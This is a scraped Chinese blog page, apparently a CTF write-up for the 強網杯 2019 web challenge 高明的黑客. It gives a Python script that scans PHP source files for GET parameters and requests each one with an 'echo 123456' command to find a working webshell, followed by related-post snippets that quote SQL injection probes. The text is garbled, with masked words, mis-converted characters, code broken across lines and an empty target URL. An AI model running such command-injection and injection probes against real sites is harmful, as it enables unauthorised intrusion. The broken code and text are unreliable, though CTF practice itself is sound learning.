原題復現 強網杯 2019 WEB高明的黑客

2021-10-02 17:24:32 字數 1256 閱讀 9827

簡介

原題復現:

考察知識點:python**編寫能力。。。

線上平台:北京聯合大學公開的ctf平台) 榆林學院內可使用信安協會內部的ctf訓練平台找到此題

簡介

開啟**發現這些 有get、pos 還有var_dump() 每個頁面都有很多看wp說這是shell 因為很多都不能用所以要編寫乙個能檢測利用的py

v1.0版本(速度太慢)

import

reimport

osimport

requests

files = os.listdir('

src/

') #

獲取路徑下的所有檔案

reg = re.compile(r'

(?<=_get\[\').*(?=\'\])

') #

設定正則

for i in files: #

從第乙個檔案開始

url = "

" +i

f = open("

src/

"+i) #

開啟這個檔案

data = f.read() #

讀取檔案內容

f.close() #

關閉檔案

result = reg.findall(data) #

從檔案中找到get請求

for j in result: #

從第乙個get引數開始

payload = url + "

?" + j + "

=echo 123456"#

#嘗試請求次路徑,並執行命令

print

(payload)

html =requests.get(payload)

if"123456"in

html.text:

print

(payload)

exit(1)

v2.0(加了多執行緒)

簡介簡介

強網杯 2019 web題 高明的黑客

復現環境 buuoj.cn 這裡貼出趙師傅的python指令碼 膜一波 import os import threading from concurrent.futures.thread import threadpoolexecutor import requests session reques...

2019強網杯小記

好久沒打過ctf了,這次打完了才意識到這次比賽的很多題其實都是一些原題或者原題變種或者拼湊起來,但奈何太久沒做過ctf了,跟不上了,太菜了qaq web6 首先掃一下目錄,存在ds store資訊洩露和一些路徑 訪問api目錄,提示post引數filename 並提供乙個array,使用postma...

強網杯 2019 隨便注

1 or 1 1 回顯了所有使用者資訊 union select 1,2 得到回顯 return preg match select update delete drop insert where i inject 過濾了 select update delete drop insert where...